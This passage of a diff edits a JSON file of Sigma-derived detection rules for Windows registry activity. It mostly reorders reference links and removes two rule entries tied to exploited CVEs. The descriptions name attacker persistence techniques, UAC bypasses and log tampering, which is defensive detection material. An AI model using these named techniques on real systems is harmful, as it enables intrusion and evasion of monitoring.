+ "https://www.dfirnotes.net/portproxy_detection/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml"
],
"tags": [
@@ -15578,8 +15273,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf",
"https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/",
+ "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf",
"https://persistence-info.github.io/Data/recyclebin.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml"
],
@@ -15648,8 +15343,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
+ "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml"
],
"tags": [
@@ -15683,8 +15378,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760",
"https://www.lexjansen.com/sesug/1993/SESUG93035.pdf",
+ "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml"
],
@@ -15753,8 +15448,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
"https://twitter.com/pabraeken/status/990717080805789697",
+ "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml"
],
"tags": [
@@ -15787,8 +15482,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/",
"https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html",
+ "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml"
],
"tags": [
@@ -16026,8 +15721,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/eset/malware-ioc/tree/master/oceanlotus",
"https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
+ "https://github.com/eset/malware-ioc/tree/master/oceanlotus",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml"
],
"tags": [
@@ -16578,10 +16273,10 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/hfiref0x/UACME",
"https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/",
- "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]",
"https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass",
+ "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]",
+ "https://github.com/hfiref0x/UACME",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml"
],
"tags": [
@@ -16656,8 +16351,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
"https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
+ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml"
],
"tags": [
@@ -16758,8 +16453,8 @@
"logsource.product": "windows",
"refs": [
"https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer",
- "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html",
"http://woshub.com/how-to-clear-rdp-connections-history/",
+ "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml"
],
"tags": [
@@ -16933,11 +16628,11 @@
"logsource.category": "registry_delete",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md",
- "https://github.com/OTRF/detection-hackathon-apt29/issues/7",
- "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
- "https://docs.microsoft.com/en-us/windows/win32/shell/launch",
"https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code",
+ "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/7",
+ "https://docs.microsoft.com/en-us/windows/win32/shell/launch",
+ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml"
],
"tags": [
@@ -17037,8 +16732,8 @@
"logsource.category": "registry_add",
"logsource.product": "windows",
"refs": [
- "https://persistence-info.github.io/Data/diskcleanuphandler.html",
"https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
+ "https://persistence-info.github.io/Data/diskcleanuphandler.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml"
],
"tags": [
@@ -17095,11 +16790,11 @@
"logsource.category": "registry_add",
"logsource.product": "windows",
"refs": [
- "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/",
- "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
- "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
"https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
+ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
+ "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/",
+ "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_malware_netwire.yml"
],
"tags": [
@@ -17165,8 +16860,8 @@
"logsource.category": "registry_add",
"logsource.product": "windows",
"refs": [
- "https://persistence-info.github.io/Data/amsi.html",
"https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c",
+ "https://persistence-info.github.io/Data/amsi.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml"
],
"tags": [
@@ -17256,8 +16951,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
"https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
+ "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml"
],
"tags": [
@@ -17298,8 +16993,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/",
"https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml",
+ "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/",
"https://twitter.com/Hexacorn/status/991447379864932352",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml"
],
@@ -17366,8 +17061,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN",
"https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/",
+ "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml"
],
"tags": [
@@ -17387,50 +17082,6 @@
"uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6",
"value": "Potential Persistence Via App Paths Default Property"
},
- {
- "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum",
- "meta": {
- "author": "Sittikorn S, frack113",
- "creation_date": "2021/07/16",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml",
- "level": "critical",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/",
- "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1566",
- "attack.t1203",
- "cve.2021.33771",
- "cve.2021.31979"
- ]
- },
- "related": [
- {
- "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00",
- "value": "CVE-2021-31979 CVE-2021-33771 Exploits"
- },
{
"description": "Detect set Notification_Suppress to 1 to disable the windows security center notification",
"meta": {
@@ -17477,8 +17128,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
"https://persistence-info.github.io/Data/htmlhelpauthor.html",
+ "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml"
],
"tags": [
@@ -17575,8 +17226,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44",
"https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml"
],
"tags": [
@@ -17676,11 +17327,11 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN",
+ "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
"https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/",
- "https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6",
"https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html",
+ "https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml"
],
"tags": [
@@ -17739,8 +17390,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml"
],
"tags": [
@@ -17773,13 +17424,13 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
"https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
"https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html",
- "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
"http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
+ "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml"
],
"tags": [
@@ -17846,8 +17497,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
"https://twitter.com/malmoeb/status/1560536653709598721",
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml"
],
"tags": [
@@ -17872,8 +17523,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml"
],
"tags": [
@@ -17901,39 +17552,6 @@
"uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298",
"value": "Session Manager Autorun Keys Modification"
},
- {
- "description": "Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/04/05",
- "falsepositive": [
- "Legitimate reminders received for a task or a note will also trigger this rule."
- ],
- "filename": "registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml",
- "level": "low",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1137"
- ]
- },
- "related": [
- {
- "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fc06e655-d98c-412f-ac76-05c2698b1cb2",
- "value": "Outlook Task/Note Reminder Received"
- },
{
"description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes",
"meta": {
@@ -17947,8 +17565,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
"https://persistence-info.github.io/Data/wer_debugger.html",
+ "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml"
],
"tags": [
@@ -17994,8 +17612,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass",
"https://www.exploit-db.com/exploits/47696",
+ "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml"
],
"tags": [
@@ -18069,8 +17687,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/",
"https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml"
],
"tags": [
@@ -18103,9 +17721,9 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
"https://twitter.com/inversecos/status/1494174785621819397",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml"
],
"tags": [
@@ -18222,8 +17840,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://vanmieghem.io/stealth-outlook-persistence/",
"https://twitter.com/_vivami/status/1347925307643355138",
+ "https://vanmieghem.io/stealth-outlook-persistence/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml"
],
"tags": [
@@ -18258,9 +17876,9 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml"
],
"tags": [
@@ -18361,8 +17979,8 @@
"logsource.product": "windows",
"refs": [
"https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649",
- "https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html",
"https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials",
+ "https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml"
],
"tags": [
@@ -18395,8 +18013,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
"https://twitter.com/dottor_morte/status/1544652325570191361",
+ "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml"
],
"tags": [
@@ -18541,8 +18159,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml"
],
"tags": [
@@ -18608,8 +18226,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
"https://github.com/last-byte/PersistenceSniper",
+ "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml"
],
"tags": [
@@ -18708,8 +18326,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s",
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md",
+ "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml"
],
"tags": [
@@ -18765,8 +18383,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/WhichbufferArda/status/1543900539280293889",
"https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp",
+ "https://twitter.com/WhichbufferArda/status/1543900539280293889",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml"
],
"tags": [
@@ -18942,8 +18560,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
"https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
+ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml"
],
"tags": [
@@ -18979,8 +18597,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://persistence-info.github.io/Data/diskcleanuphandler.html",
"https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
+ "https://persistence-info.github.io/Data/diskcleanuphandler.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml"
],
"tags": [
@@ -19060,8 +18678,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb",
"https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_databases.yml"
],
"tags": [
@@ -19229,8 +18847,8 @@
"refs": [
"https://persistence-info.github.io/Data/userinitmprlogonscript.html",
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml"
],
"tags": [
@@ -19370,13 +18988,13 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
"https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
"https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html",
- "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
"http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
+ "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml"
],
"tags": [
@@ -19445,8 +19063,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml"
],
"tags": [
